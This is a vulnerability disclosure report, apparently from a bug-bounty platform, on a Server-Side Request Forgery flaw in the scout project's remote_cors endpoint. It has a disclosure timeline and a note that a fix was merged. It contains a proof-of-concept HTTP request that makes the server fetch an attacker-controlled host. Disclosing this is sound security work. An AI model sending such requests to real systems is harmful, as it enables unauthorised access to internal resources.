Server-Side Request Forgery in scout in clinical-genomics/scout

Valid

Reported on

May 3rd 2022

Description

Server-Side Request Forgery in remote_cors

Proof of Concept

GET /remote/cors/http://<my-vps>:8888 HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8000/cust000/cases
Cookie: <cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

PoC Image

image

Impact

An attacker could make the application perform arbitrary requests to fishing steal cookie, request to private area, or lead to xss...

We are processing your report and will contact the clinical-genomics/scout team within 24 hours. 21 days ago
Nhien.IT modified the report
21 days ago
Nhien.IT modified the report
21 days ago
Nhien.IT modified the report
20 days ago
We have contacted a member of the clinical-genomics/scout team and are waiting to hear back 20 days ago
Chiara Rasi validated this vulnerability 19 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Chiara Rasi confirmed that a fix has been merged on b0ef15 19 days ago
Chiara Rasi has been awarded the fix bounty
Nhien.IT
19 days ago

Researcher

Hi @maintainer, the fix is already released, can you assign a CVE here? if you can, hope @admin help

Jamie Slome
19 days ago

Admin

Sorted 👍

to join this conversation